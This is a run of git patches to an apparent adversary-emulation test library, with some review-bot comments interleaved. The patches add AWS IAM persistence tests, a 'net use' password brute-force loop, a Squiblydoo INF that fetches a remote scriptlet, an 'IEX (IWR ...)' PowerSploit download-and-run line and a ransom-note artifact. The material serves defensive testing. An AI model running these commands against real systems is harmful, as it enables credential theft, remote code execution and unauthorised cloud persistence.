[CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Administration Command](../../T1609/T1609.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Build Image on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container API](../../T1552.007/T1552.007.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [External Remote Services](../../T1133/T1133.md) | [Cron](../../T1053.003/T1053.003.md) | [Application Shimming](../../T1546.011/T1546.011.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Container and Resource Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [RDP Hijacking](../../T1563.002/T1563.002.md) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | 
@@ -20,7 +20,7 @@ | Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchd](../../T1053.004/T1053.004.md) | [Browser Extensions](../../T1176/T1176.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | [Software Deployment Tools](../../T1072/T1072.md) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Compiled HTML 
File](../../T1218.001/T1218.001.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Sniffing](../../T1040/T1040.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) | +| | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cloud Account](../../T1136.003/T1136.003.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Sniffing](../../T1040/T1040.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) | | | [Native API](../../T1106/T1106.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control 
Panel](../../T1218.002/T1218.002.md) | [Golden Ticket](../../T1558.001/T1558.001.md) | [Password Policy Discovery](../../T1201/T1201.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | Network Device CLI [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | [PowerShell](../../T1059.001/T1059.001.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Windows Remote Management](../../T1021.006/T1021.006.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) | diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 50f26155..39a35232 100644 --- a/atomics/Indexes/index.yaml 
+++ b/atomics/Indexes/index.yaml @@ -36754,6 +36754,39 @@ persistence: ' name: powershell + - name: AWS - Create a group and add a user to that group + auto_generated_guid: 8822c3b0-d9f9-4daf-a043-49f110a31122 + description: 'Adversaries create AWS group, add users to specific to that group + to elevate their privilieges to gain more accesss + +' + supported_platforms: + - iaas:aws + input_arguments: + username: + description: Name of the AWS group to create + type: String + default: atomicredteam + dependencies: + - description: 'Check if the user exists, we can only add a user to a group + if the user exists. + +' + prereq_command: 'aws iam list-users | grep #{username} + +' + get_prereq_command: 'echo Please run atomic test T1136.003, before running + this atomic test + +' + executor: + command: | + aws iam create-group --group-name #{username} + aws iam add-user-to-group --user-name #{username} --group-name #{username} + cleanup_command: | + aws iam remove-user-from-group --user-name #{username} --group-name #{username} + aws iam delete-group --group-name #{username} + name: sh T1547.014: technique: external_references: 
@@ -37007,7 +37040,42 @@ persistence: x_mitre_platforms: - IaaS - Azure AD - atomic_tests: [] + identifier: T1098.001 + atomic_tests: + - name: AWS - Create Access Key and Secret Key + auto_generated_guid: 8822c3b0-d9f9-4daf-a043-491160a31122 + description: 'Adversaries create their own new access and secret keys to programatically + interact with AWS environment, which is already compromised + +' + supported_platforms: + - iaas:aws + input_arguments: + username: + description: Create new AWS access and secret keys for the user + type: String + default: atomicredteam + dependencies: + - description: 'Check if the user exists. + +' + prereq_command: 'aws iam list-users | grep #{username} + +' + get_prereq_command: 'echo Please run atomic test T1136.003, before running + this atomic + +' + executor: + command: | + aws iam create-access-key --user-name #{username} > $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds + cd $PathToAtomicsFolder/T1098.001/bin/ + ./aws_secret.sh + cleanup_command: | + access_key=`cat $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds| jq -r '.AccessKey.AccessKeyId'` + aws iam delete-access-key --access-key-id $access_key --user-name #{username} + rm $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds + name: sh T1546.009: technique: external_references: 
@@ -38578,7 +38646,43 @@ persistence: - Office 365 - IaaS - Google Workspace - atomic_tests: [] + identifier: T1136.003 + atomic_tests: + - name: AWS - Create a new IAM user + auto_generated_guid: 8d1c2368-b503-40c9-9057-8e42f21c58ad + description: 'Creates a new IAM user in AWS. Upon successful creation, a new + user will be created. Adversaries create new IAM users so that their malicious + activity do not interupt the normal functions of the compromised users and + can remain undetected for a long time + +' + supported_platforms: + - iaas:aws + input_arguments: + username: + description: Username of the IAM user to create in AWS + type: String + default: atomicredteam + dependencies: + - description: 'Check if ~/.aws/credentials file has a default stanza is configured + +' + prereq_command: 'cat ~/.aws/credentials | grep "default" + +' + get_prereq_command: 'echo Please install the aws-cli and configure your AWS + defult profile using: aws configure + +' + executor: + command: 'aws iam create-user --user-name #{username} + +' + cleanup_command: 'aws iam delete-user --user-name #{username} + +' + name: sh + elevation_required: false T1078.004: technique: id: attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65 diff --git a/atomics/T1098.001/T1098.001.md b/atomics/T1098.001/T1098.001.md new file mode 100644 index 00000000..c7e59069 --- /dev/null +++ b/atomics/T1098.001/T1098.001.md @@ -0,0 +1,66 @@ +# T1098.001 - Additional Cloud Credentials +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1098/001) +
Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment. + +Adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals) + +In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)
+ +## Atomic Tests + +- [Atomic Test #1 - AWS - Create Access Key and Secret Key](#atomic-test-1---aws---create-access-key-and-secret-key) + + +
+ +## Atomic Test #1 - AWS - Create Access Key and Secret Key +Adversaries create their own new access and secret keys to programatically interact with AWS environment, which is already compromised + +**Supported Platforms:** Iaas:aws + + +**auto_generated_guid:** 8822c3b0-d9f9-4daf-a043-491160a31122 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| username | Create new AWS access and secret keys for the user | String | atomicredteam| + + +#### Attack Commands: Run with `sh`! + + +```sh +aws iam create-access-key --user-name #{username} > $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds +cd $PathToAtomicsFolder/T1098.001/bin/ +./aws_secret.sh +``` + +#### Cleanup Commands: +```sh +access_key=`cat $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds| jq -r '.AccessKey.AccessKeyId'` +aws iam delete-access-key --access-key-id $access_key --user-name #{username} +rm $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds +``` + + + +#### Dependencies: Run with `sh`! +##### Description: Check if the user exists. +##### Check Prereq Commands: +```sh +aws iam list-users | grep #{username} +``` +##### Get Prereq Commands: +```sh +echo Please run atomic test T1136.003, before running this atomic +``` + + + + +
diff --git a/atomics/T1098/T1098.md b/atomics/T1098/T1098.md index ff4d250c..d6643fc3 100644 --- a/atomics/T1098/T1098.md +++ b/atomics/T1098/T1098.md @@ -8,6 +8,8 @@ - [Atomic Test #2 - Domain Account and Group Manipulate](#atomic-test-2---domain-account-and-group-manipulate) +- [Atomic Test #3 - AWS - Create a group and add a user to that group](#atomic-test-3---aws---create-a-group-and-add-a-user-to-that-group) +
@@ -143,4 +145,55 @@ if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) { +
+
+ +## Atomic Test #3 - AWS - Create a group and add a user to that group +Adversaries create AWS group, add users to specific to that group to elevate their privilieges to gain more accesss + +**Supported Platforms:** Iaas:aws + + +**auto_generated_guid:** 8822c3b0-d9f9-4daf-a043-49f110a31122 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| username | Name of the AWS group to create | String | atomicredteam| + + +#### Attack Commands: Run with `sh`! + + +```sh +aws iam create-group --group-name #{username} +aws iam add-user-to-group --user-name #{username} --group-name #{username} +``` + +#### Cleanup Commands: +```sh +aws iam remove-user-from-group --user-name #{username} --group-name #{username} +aws iam delete-group --group-name #{username} +``` + + + +#### Dependencies: Run with `sh`! +##### Description: Check if the user exists, we can only add a user to a group if the user exists. +##### Check Prereq Commands: +```sh +aws iam list-users | grep #{username} +``` +##### Get Prereq Commands: +```sh +echo Please run atomic test T1136.003, before running this atomic test +``` + + + +
diff --git a/atomics/T1136.003/T1136.003.md b/atomics/T1136.003/T1136.003.md new file mode 100644 index 00000000..e95db1fc --- /dev/null +++ b/atomics/T1136.003/T1136.003.md @@ -0,0 +1,60 @@ +# T1136.003 - Cloud Account +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1136/003) +
Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users) + +Adversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection.
+ +## Atomic Tests + +- [Atomic Test #1 - AWS - Create a new IAM user](#atomic-test-1---aws---create-a-new-iam-user) + + +
+ +## Atomic Test #1 - AWS - Create a new IAM user +Creates a new IAM user in AWS. Upon successful creation, a new user will be created. Adversaries create new IAM users so that their malicious activity do not interupt the normal functions of the compromised users and can remain undetected for a long time + +**Supported Platforms:** Iaas:aws + + +**auto_generated_guid:** 8d1c2368-b503-40c9-9057-8e42f21c58ad + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| username | Username of the IAM user to create in AWS | String | atomicredteam| + + +#### Attack Commands: Run with `sh`! + + +```sh +aws iam create-user --user-name #{username} +``` + +#### Cleanup Commands: +```sh +aws iam delete-user --user-name #{username} +``` + + + +#### Dependencies: Run with `sh`! +##### Description: Check if ~/.aws/credentials file has a default stanza is configured +##### Check Prereq Commands: +```sh +cat ~/.aws/credentials | grep "default" +``` +##### Get Prereq Commands: +```sh +echo Please install the aws-cli and configure your AWS defult profile using: aws configure +``` + + + + +
From 248d2ed9ccbf45a4bbed5ae8143f2581f5779cc1 Mon Sep 17 00:00:00 2001 From: mhaag-spl <5632822+MHaggis@users.noreply.github.com> Date: Thu, 24 Jun 2021 15:01:42 -0600 Subject: [PATCH 72/84] Update T1110.001.yaml Resolving #1423 --- atomics/T1110.001/T1110.001.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/atomics/T1110.001/T1110.001.yaml b/atomics/T1110.001/T1110.001.yaml index 9cec219a..3cd7f88a 100644 --- a/atomics/T1110.001/T1110.001.yaml +++ b/atomics/T1110.001/T1110.001.yaml @@ -32,6 +32,9 @@ atomic_tests: echo "1q2w3e4r" >> #{input_file_passwords} echo "Password!" >> #{input_file_passwords} @FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL + cleanup_command: |- + del #{input_file_users} + del #{input_file_passwords} - name: Brute Force Credentials of single domain user via LDAP against domain controller (NTLM or Kerberos) auto_generated_guid: c2969434-672b-4ec8-8df0-bbb91f40e250 description: | From 9da2cce7347dc953d1d8902881ad85652978f317 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 24 Jun 2021 21:05:35 +0000 Subject: [PATCH 73/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 3 +++ atomics/T1110.001/T1110.001.md | 5 +++++ 2 files changed, 8 insertions(+) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 39a35232..c67428eb 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
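Review bot: The added `cleanup_command` runs `del` on both input files without redirecting its output, so when cleanup is invoked on a host where the attack command never created the files (or after a partial run) the operator's console gets a "Could Not Find" error instead of a quiet no-op; the PureLocker cleanup later in this series takes the quieter form, so for consistency use `del #{input_file_users} >nul 2>&1` and `del #{input_file_passwords} >nul 2>&1`. The test this hunk extends starts above the hunk, so the `#{input_file_*}` defaults and the directory they resolve to are not visible here; if those defaults can contain spaces the paths should also be quoted.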
@@ -4369,6 +4369,9 @@ credential-access: echo "1q2w3e4r" >> #{input_file_passwords} echo "Password!" >> #{input_file_passwords} @FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL + cleanup_command: |- + del #{input_file_users} + del #{input_file_passwords} - name: Brute Force Credentials of single domain user via LDAP against domain controller (NTLM or Kerberos) auto_generated_guid: c2969434-672b-4ec8-8df0-bbb91f40e250 diff --git a/atomics/T1110.001/T1110.001.md b/atomics/T1110.001/T1110.001.md index 03513e36..1a6ad4fa 100644 --- a/atomics/T1110.001/T1110.001.md +++ b/atomics/T1110.001/T1110.001.md @@ -64,6 +64,11 @@ echo "Password!" >> #{input_file_passwords} @FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL ``` +#### Cleanup Commands: +```cmd +del #{input_file_users} +del #{input_file_passwords} +``` From d6e0adbfff461555d1f2a214e691610949c85378 Mon Sep 17 00:00:00 2001 From: mhaag-spl <5632822+MHaggis@users.noreply.github.com> Date: Thu, 24 Jun 2021 15:36:34 -0600 Subject: [PATCH 74/84] Update Infdefaultinstall.inf Updated and good to go! Resolving #1449 --- atomics/T1218/src/Infdefaultinstall.inf | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1218/src/Infdefaultinstall.inf b/atomics/T1218/src/Infdefaultinstall.inf index 57d45ecf..49ee5872 100644 --- a/atomics/T1218/src/Infdefaultinstall.inf +++ b/atomics/T1218/src/Infdefaultinstall.inf 
@@ -5,4 +5,4 @@ Signature=$CHICAGO$ UnregisterDlls = Squiblydoo [Squiblydoo] -11,,scrobj.dll,2,60,https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/src/T1085.sct +11,,scrobj.dll,2,60,https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct From f85d4a0d65032769773040f56bab89adbcd8c467 Mon Sep 17 00:00:00 2001 From: Michael Haag <5632822+MHaggis@users.noreply.github.com> Date: Mon, 28 Jun 2021 08:56:57 -0600 Subject: [PATCH 75/84] Update T1135.yaml (#1533) Updated and confirmed operational. #1441 Co-authored-by: Carrie Roberts --- atomics/T1135/T1135.yaml | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/atomics/T1135/T1135.yaml b/atomics/T1135/T1135.yaml index 7567f6f3..ff02d0ae 100644 --- a/atomics/T1135/T1135.yaml +++ b/atomics/T1135/T1135.yaml @@ -88,6 +88,14 @@ atomic_tests: Enumerate Domain Shares the current user has access. Upon execution, progress info about each share being scanned will be displayed. supported_platforms: - windows + dependency_executor_name: powershell + dependencies: + - description: | + Endpoint must be joined to domain + prereq_command: | + if ((Get-WmiObject -Class Win32_ComputerSystem).PartofDomain) {exit 0} else {exit 1} + get_prereq_command: | + "Join system to domain" executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 From 2b4cf3f6a47f17d78f6ac3f7d35e4103679b4786 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 28 Jun 2021 14:57:33 +0000 Subject: [PATCH 76/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 12 ++++++++++++ atomics/T1135/T1135.md | 12 ++++++++++++ 2 files changed, 24 insertions(+) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index c67428eb..e789dbe4 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
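Review bot: The corrected scriptlet URL still resolves against the `master` branch, so the same breakage will recur the next time `RegSvr32.sct` is moved or renamed, which is presumably what happened to the old `T1085` path this commit fixes. If the test is meant to stay reproducible, pin the URL to a specific commit (or a release tag) instead of `master`, or fetch the scriptlet from the local atomics folder the way other tests reference `$PathToAtomicsFolder`. Only the four lines of the `[Squiblydoo]` section are visible here.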
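Review bot: `Get-WmiObject` in the new `prereq_command` is not available in PowerShell 7 (Core), so the dependency check fails on those runners before the domain-join test ever executes; the CIM cmdlet is already the form used by other prereq checks in this repo (e.g. the `Get-CimInstance -ClassName Win32_OperatingSystem` check visible in the T1098 hunk earlier in this series), so change it to `if ((Get-CimInstance -ClassName Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}`. The `get_prereq_command` body `"Join system to domain"` is a bare string expression that happens to print; `Write-Host "Join system to domain"` makes the intent explicit and matches the message-only pattern of the other `get_prereq_command` entries. The atomic test this hunk extends begins above the hunk.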
@@ -51367,6 +51367,18 @@ discovery: ' supported_platforms: - windows + dependency_executor_name: powershell + dependencies: + - description: 'Endpoint must be joined to domain + +' + prereq_command: 'if ((Get-WmiObject -Class Win32_ComputerSystem).PartofDomain) + {exit 0} else {exit 1} + +' + get_prereq_command: '"Join system to domain" + +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 diff --git a/atomics/T1135/T1135.md b/atomics/T1135/T1135.md index a45e078c..3a6992bb 100644 --- a/atomics/T1135/T1135.md +++ b/atomics/T1135/T1135.md @@ -217,6 +217,18 @@ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d29 +#### Dependencies: Run with `powershell`! +##### Description: Endpoint must be joined to domain +##### Check Prereq Commands: +```powershell +if ((Get-WmiObject -Class Win32_ComputerSystem).PartofDomain) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +"Join system to domain" +``` + +
From 691982bbdbe5e1f3285aa13043ac040fbaee0517 Mon Sep 17 00:00:00 2001 From: lexiechong <58893774+lexiechong@users.noreply.github.com> Date: Mon, 28 Jun 2021 10:46:45 -0500 Subject: [PATCH 77/84] T1486-update (#1536) Co-authored-by: Chong Co-authored-by: Carrie Roberts --- atomics/T1486/T1486.yaml | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) diff --git a/atomics/T1486/T1486.yaml b/atomics/T1486/T1486.yaml index 44f8222c..ecde61fb 100644 --- a/atomics/T1486/T1486.yaml +++ b/atomics/T1486/T1486.yaml @@ -162,3 +162,19 @@ atomic_tests: cleanup_command: | $which_openssl rsautl -decrypt -inkey #{private_key_path} -in #{encrypted_file_path} rm #{encrypted_file_path} + +- name: PureLocker Ransom Note + description: | + building the IOC (YOUR_FILES.txt) for the PureLocker ransomware + https://www.bleepingcomputer.com/news/security/purelocker-ransomware-can-lock-files-on-windows-linux-and-macos/ + + supported_platforms: + - windows + + executor: + name: command_prompt + elevation_required: true + command: | + echo T1486 - Purelocker Ransom Note > %USERPROFILE%\Desktop\YOUR_FILES.txt + cleanup_command: | + del %USERPROFILE%\Desktop\YOUR_FILES.txt >nul 2>&1 From 03c05404ae8855abdb39f3a39d139e4e0aea673c Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Mon, 28 Jun 2021 15:47:07 +0000 Subject: [PATCH 78/84] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1486/T1486.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1486/T1486.yaml b/atomics/T1486/T1486.yaml index ecde61fb..3e2b9d04 100644 --- a/atomics/T1486/T1486.yaml +++ b/atomics/T1486/T1486.yaml 
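Review bot: `elevation_required: true` on the new PureLocker Ransom Note test does not match what the command does — it only echoes one line into `%USERPROFILE%\Desktop\YOUR_FILES.txt`, which any interactive user can write — so the flag causes the test to be skipped or prompt on runners without admin rights for no benefit; unless elevation is needed for a reason not visible in this hunk, set `elevation_required: false`. Note also that when a runner does elevate, `%USERPROFILE%` may expand to the elevated account's profile rather than the logged-on user's, so the artifact can land on a different desktop than the description implies. The description line "building the IOC (YOUR_FILES.txt) for the PureLocker ransomware" would read better as "Creates the PureLocker ransomware ransom-note IOC (YOUR_FILES.txt) on the user's desktop".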
@@ -164,6 +164,7 @@ atomic_tests: rm #{encrypted_file_path} - name: PureLocker Ransom Note + auto_generated_guid: 649349c7-9abf-493b-a7a2-b1aa4d141528 description: | building the IOC (YOUR_FILES.txt) for the PureLocker ransomware https://www.bleepingcomputer.com/news/security/purelocker-ransomware-can-lock-files-on-windows-linux-and-macos/ diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 0c7557d9..b94da380 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -725,3 +725,4 @@ b4988cad-6ed2-434d-ace5-ea2670782129 8822c3b0-d9f9-4daf-a043-491160a31122 8822c3b0-d9f9-4daf-a043-49f110a31122 8d1c2368-b503-40c9-9057-8e42f21c58ad +649349c7-9abf-493b-a7a2-b1aa4d141528 From 4375c6ca56eaac08df3c2d8646b29f27674a372e Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 28 Jun 2021 15:47:13 +0000 Subject: [PATCH 79/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- .../art-navigator-layer-windows.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 3 +- atomics/Indexes/Matrices/windows-matrix.md | 2 +- atomics/Indexes/index.yaml | 15 ++++++++ atomics/T1486/T1486.md | 35 +++++++++++++++++++ 8 files changed, 57 insertions(+), 3 deletions(-) diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json index 4ee7afcc..0d988691 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json 
